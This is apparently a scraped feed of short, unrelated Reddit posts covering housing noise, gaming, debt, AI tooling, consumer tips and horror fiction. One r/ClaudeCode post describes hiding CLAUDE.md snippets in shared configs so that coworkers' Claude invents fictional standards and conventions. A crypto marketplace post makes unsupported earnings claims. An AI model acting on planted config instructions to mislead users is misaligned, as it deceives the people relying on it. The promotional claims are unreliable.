This is my first time dealing with this issue in the 12 years I’ve lived here. I’m on the 4th floor. He coughs all night after smoking and on some nights screams random things. At 4am he started screaming sexually harassments at a lady and threatened to kill her a couple weeks ago. He chose a spot just on a sidewalk under no roof. My neighbours gave him a tent and a sleeping bag, and he sold it for substances. I feel terrible for him but have no idea what I can even do about it. My partner and I both play white noise to try to sleep, but I still wake up multiple times in a night. I teach elementary school, and it’s impacting my work. His sleep is definitely worse than mine, so I feel terrible even thinking these complaints sometimes.

I bought silicone ear plugs to go over my years. Other than that, is there anything I can do?

r/leagueoflegends rexandred

Victorious Skin Chromas?

Let's say i'm Iron right now, and the split is going to end on May(?). When will I get the Braum skin? And if I reach Diamond before 2027 season but AFTER May, will I obtain his Diamond and lower Chromas?

T4R.

r/metaldetecting inComplete-Oven

Aliexpress Skycruiser S63

Hi, does anybody have the mentioned detector? It's about 300 Euro currently, so not cheap, but I cannot find any English speaking reviews, just useless YT shorts etc. Would be very interested in how well it performs.

r/personalfinance EpifaniaPics

Should I file bankruptcy or do a settlement amount

Hello everyone, Ive come onto difficult times and need help. When I was 18 I had no clue how to fix stuff on my car and thought getting a new car was the way to go. I asked my mother and she agreed and we got a 2020 corolla for $535.37 a month (minimum) around 2022 after I graduated. I was doing payments until about 1.5 years ago after I realized I couldnt afford it with college and what not and let them do a voluntary repo. Before that I found out I owe about $20000 on the car and they were able to sell it for $10,000ish. I now owe $9000 but I can't make payments on it. I was thinking about possibly doing $50 a month as I work parttime while doing college. I have felt overwhelmed and saddened by the constant calls and am starting to see it affect my mental health. I make around $1.6k a month but majority of it goes to school or rent. This made me start thinking about filing bankruptcy or doing a settlement. I want to do bankruptcy but I know my mother would most likely sue me as shes mentioned before that she wants me to make the payments (also she is the co-signer). I appreciate any advice. (My APR was 20% when we got the loan)

r/LocalLLaMA BrightOpposite

MCP is great, but it doesn’t solve AI memory (am I missing something?)

I’ve been experimenting with MCP servers + Claude for a bit now, and I keep running into the same issue:

the AI is still fundamentally stateless.

Even with tools and structured calls, every interaction feels like it starts from scratch unless you manually pipe context back in.

Which leads to things like:

  • repeating instructions
  • re-explaining user intent
  • inconsistent outputs across sessions

MCP improves capability routing, no doubt.

But it doesn’t really address context persistence.

Feels like we’ve made AI more powerful…

but not more aware.

Curious how others are handling this:

  • Are you building your own memory layer?
  • Using vector DBs / session stitching?
  • Or just accepting the stateless nature for now?

Would love to hear how people are thinking about this.

r/SipsTea snokegsxr

Babe, wake up! New Iranian Lego Style Animation just dropped

r/LifeProTips urbanracer34

LPT: Do not buy certain items from Amazon. One example is SD cards. More info in text.

Using SD cards as an example of this, I have heard many people get faulty cards bought from Amazon.

Here's the thing: Amazon sees all cards as the same. They are all put in the same bin, regardless of origin. So your legitimate 32GB SD card is going to be in a pile of other 32GB SD cards, legitimate or not. You don't know which one you are getting.

Thanks for coming to my TEDTalk.

r/Seattle mote0fdust

Instacart charges fee for "straight to me" but then does not actually deliver order straight to me...

Just want everyone to be aware of yet another shady practice by these delivery companies. Last night I needed groceries before the week but was too tired to go grab them. I also wanted to get to bed quick, so I ordered on Instacart and selected the option "straight to me" for an additional fee. I was surprised when my 6 items took the delivery person over 45 minutes to shop and then got an alert they were "making another delivery" before dropping off mine, I texted them asking if they were delivering to someone else before me and they confirmed. I then requested a refund of the fee from Instacart but was informed that the "straight to me" fee was not actually a fee for being delivered straight to me, but it was simply to "prioritize" the order and I was not refunded.

Idk what hot garbage this is, but just wanted others in Seattle to be aware. I already filed a complaint with the WA state Attorney General for misleading consumer business practices.

r/ChatGPT MontyOW

Is there any way to keep context when you hit the chat length limit?

Every time I build up a good chat it hits the length limit and I have to start over and the new chat never gets me like the old one did. Is there any way to carry context over to the new chat? I feel like my productivity is being killed everytime I have to restart in a new chat and I can't take it anymore

r/TwoSentenceHorror 54321RUN

My mother hadn't seen my brother in years, so for her birthday I surprised her by bringing him to dinner.

She always thought that was behind his disappearance all those years ago, so when she saw his rotten corpse, she knew for sure.

r/Jokes al3x696

What is the angriest bread roll?

It’s a hot, Cross Bun of course!

r/creepypasta deathbymediaman

On This Spot - File 338c - "Doll Faced David"

Doll Faced David is an anomalous entity who has been spotted on public transit on the East Side of the city of [ʀᴇᴅᴀᴄᴛᴇᴅ].

As the file details, the creature/individual is most often considered passive/docile, but [ᴀᴄᴄᴏʀᴅɪɴɢ ᴛᴏ ᴡɪᴛɴᴇꜱꜱ ᴛᴇꜱᴛɪᴍᴏɴʏ] is capable of surreal acts of violence, should attention be drawn to its facial covering.

[ᴠɪᴅᴇᴏ ᴅᴇɢʀᴀᴅᴀᴛɪᴏɴ ᴏɴ ᴛʜɪꜱ ꜰɪʟᴇ ɪꜱ ꜱᴇᴇᴍɪɴɢʟʏ ᴜɴɪɴᴛᴇɴᴛɪᴏɴᴀʟ, ᴀɴᴅ ɪꜱ ᴄᴏɴꜱɪᴅᴇʀᴇᴅ ᴛʜᴇ ʀᴇꜱᴜʟᴛ ᴏꜰ ᴀ ꜱᴇᴘᴀʀᴀᴛᴇ, ᴏᴜᴛꜱɪᴅᴇ, ᴘᴀʀᴀɴᴏʀᴍᴀʟ ɪɴꜰʟᴜᴇɴᴄᴇ ᴏɴ ᴛʜᴇ ᴜꜱᴇʀ'ꜱ ʜᴀʀᴅᴡᴀʀᴇ.]

r/arduino Mislav5421

Error when uploading sketch

Whenever i try to upload a sketch to my arduino nano i get the same error messages.

My board is set to arduino nano, i've tried every single option for processor (i've read that setting the processor option to old bootloader solves the issue but that doesn't work for me).

The correct port is also selected.

There is nothing connected to the board.

Holding/pressing the reset button right before uploading doesn't fix the issue.

I've tested uploading code and uploading an empty sketch(just the empty setup and loop functions)

I'm very close to throwing away the board because i think it actually might be broken but i wanna first hear if any of you have had this problem and how you have solved it.

r/funny SupaSays

Easter Lamb Cake

r/LocalLLaMA Macstudio-ai-rental

[WTS] Rent remote access to my 512GB RAM Mac Studio for massive LLM testing

https://preview.redd.it/111ypxf3tjtg1.png?width=266&format=png&auto=webp&s=0cc2143ac5c1a540a6bb8e69491126e91e97010b

Hey everyone,

I know it’s incredibly expensive to rent 8x A100 cloud clusters just to test whether a massive model (like Grok, Llama 3 400B, or DeepSeek variants) works for your specific use case. I have a 512GB Mac Studio sitting on my desk with a 2Gbps fiber connection, and I'm renting out isolated remote access to it.

The Setup:

  • Hardware: Mac Studio M-Series Ultra
  • VRAM/Memory: Up to 400GB of Unified Memory allocated directly to your environment.
  • Network: 2 Gbps up/down fiber internet (download your weights from HuggingFace in minutes, not hours).

Privacy & Access: You aren't just getting a user account on my personal machine. You get secure SSH access directly into a dedicated, locked-down macOS Virtual Machine via a private Tailscale network.

When your rental period is over, the VM is completely nuked and wiped, so your proprietary data, code, and prompts remain 100% private.

Pricing:

  • Daily Pass (24 hours): $50 flat. (No spot-instance interruptions or ticking-clock anxiety while you compile or run long inference tests).
  • Need it for just a couple of hours for a quick benchmark? Or need a multi-day lock-in? Shoot me a DM and we can work out a custom rate.

If you want to spin up a test run or have any questions about the environment, send me a direct message!

r/DunderMifflin cityrapunzel

look who’s here

i’m watching Better Call Saul, and look, i found nate. totally opposite of his character in the office. lol

r/funny heyrickyhowsitgerrrn

Drawing On The Fridge - Ep1

r/ollama gglavida

Do we know when they'll launch GLM 5.1 and GLM 5V Turbo to Ollama Cloud?

Do we have people from the Ollama team here?

is there a roadmap we can take a look at?

r/SideProject ApoNiEstong

Earn through referrals with THE NEW CRYPTOCOMMERCE

Bazaars.app is a next-generation peer-to-peer marketplace that allow users to buy and sell digital or physical products with crypto.

🇬🇧 Bazaars is registered in the United Kingdom (https://x.com/BazaarsBzr/status/1864686254367101315).

🛒 Marketplace: https://bazaars.app/

🔑 Key features

  1. Crypto Payments: Buy products using USDT, USDC, ETH, or BZR tokens directly from your Web3 wallet.

  2. On-Chain KYC Verification: Ensuring secure, trusted transactions for all sellers.

  3. Free Listings: Sellers can list products without fees.

  4. Customer Support 24/7: We're here for you anytime you need assistance.

  5. Smart Escrow: Payments are secured through smart contracts for safe transactions.

  6. Affiliate Program: Earn commissions by inviting friends to download and shop on the app.

🛍 Onboarding sellers

Got products to sell?

Join Bazaars.app and list them for FREE! All it takes is a quick verification, and you’re ready to showcase your items to the world. Start selling now!

🎉 Engagement Quest

Bazaars reward those who contribute to our community giving them a chance to claim USDTs, Discord Nitro, and Bazaars merchandise such as caps, t-shirts, and hoodies.

💸Affiliate program

Invite friends and earn! Receive a 2% commission on the total value of items purchased by anyone you refer. Our affiliates average earning is $6,000 per year!

r/LocalLLM RossPeili

Stop sending your raw PII to Big Tech. Just open-sourced a tiny model for local masking.

Tired of the "privacy vs. utility" trade-off. If you're building agentic workflows but terrified of your company's secrets or user PII hitting a third-party API, you need a pre-processor.

We just released micro-f1-mask, the first of our Micro Series at ARPA. It’s small, fast, and specifically tuned for high-precision function calling based on func-gemma-270M.

  • Open weights: Yes.
  • Training scripts: Included (train your own constitution).
  • Fine-tuning: We made it easy to swap in your own compliance/privacy frameworks.

Basically, it's a local guardrail you can run on a potato. Don't take my word for it, check the documentation and test the weights yourself. Any feedback is more than just welcome and appreciated <3

https://github.com/ARPAHLS/micro-f1-mask

r/SideProject Particular-Beat2620

7 installs, 0 revenue, 3 weeks in — here's what I learned building a silent meeting recorder

Built Velnot — a Windows app that records meetings without a bot joining the call. Transcribes with AssemblyAI, summarizes with GPT-4o.

What went wrong so far:

- Ran Google Ads before payment system was working (wasted ~$X)

- 7 installs, all on free trial, 0 conversions

- No distribution strategy at launch

What I'm fixing:

- Payment system is now live

- Shifting from paid ads to organic/creator strategy

If you've launched something in the productivity space — how did you get your first 10 paying customers?

r/ProgrammerHumor greyblake

whoNeedsDesigner

r/SideProject guillim

Free backlinks

after doing it a couple times for my little side projects, I decided to open my list of backlinks websites.

in addition with OpenClaw or Computer use / Claude desktop, you can build strong SEO backlinking automatically.

i am launching it on producthunt so i would love your upvotes first !!!

https://www.producthunt.com/products/backlinks?launch=backlinks-2

r/comfyui -Ellary-

Just a Reminder: if you want ComfyUI to generate faster, just ask it! Add `--fast` to your starting parameters (your *.bat file), to get about 20-25% boost (depends on the model).

r/homeassistant Royal_Feeling4167

How to smartfy my air exchanger?

Any device that is home assistant friendly that could replace this?

r/mildlyinteresting constanzadotjpg

Spotted a little cactus garden on a Jeep in Mexico

r/ClaudeCode TheHelgeSverre

I weaponized CLAUDE.md for office chaos and regret nothing

A collection of CLAUDE.md snippets you can bury in a shared project config to subtly mess with your coworkers' Claude.

Highlights include Claude going full GLaDOS, citing fictional standards like "the 2024 Zurich Convention," inventing repo conventions like "camelCase Tuesdays," and leaving haunted TODOs that reference merges that never happened.

Each prank is rated by chaos, subtlety, and stealth.

r/yesyesyesyesno HamboneBanjo

The empiredidnothingwrong crew will say this belongs in the other sub

r/Adulting Hell0There2005

Everything is rushed

wake up at 5am and sprint to the gym. Come back home and shower quickly. pack lunch and grab a protein shake to go. fight traffic and work. commute back home and finish house chores.

yay its 8pm and now you have free time....damn exhausted.

r/StableDiffusion -Ellary-

Just a Reminder: if you want ComfyUI to generate faster, just ask it! Add `--fast` to your starting parameters (your *.bat file), to get about 20-25% boost (depends on the model).

r/SipsTea No_Top_9023

I think he does this work normally nothing happened like this

r/creepypasta Cold-Currency-8434

Macarena Malena Gonzalo(My take on Mereana Mordegard Glesgorv)

The First Frame of an Old now deleted 2008 Video that is linked to alleged mass self enucleation

r/Art ragnar_olafson

Reden ist Silber und Schweigen ist Gold, Ragnar Olafson, markers and Acrylic, 2025 [OC]

r/ClaudeAI Necessary-Fan1847

Claude built a memory system that it maintains itself with its own MCP

Claude built itself a memory system that it maintains itself. It's not primarily for Claude Code, but for office and other tasks, but it can be used in all three modes (Chat, Cowork, and Code), so it can manage the sessions of the three different modes in one place. I don't know if there is already such a thing, but to me it's total sci-fi that it concluded from a simple scheduled task, "Develop your infrastructure!", that this is what it should start with. If you feel like it and haven't used something like this yet, try it! https://github.com/leszini/memoria-mcp

r/toastme anassaidi2024

Turning 27 and finally feeling confident in my own skin. Could really use some good vibes and a little toast today!

SortedFor.me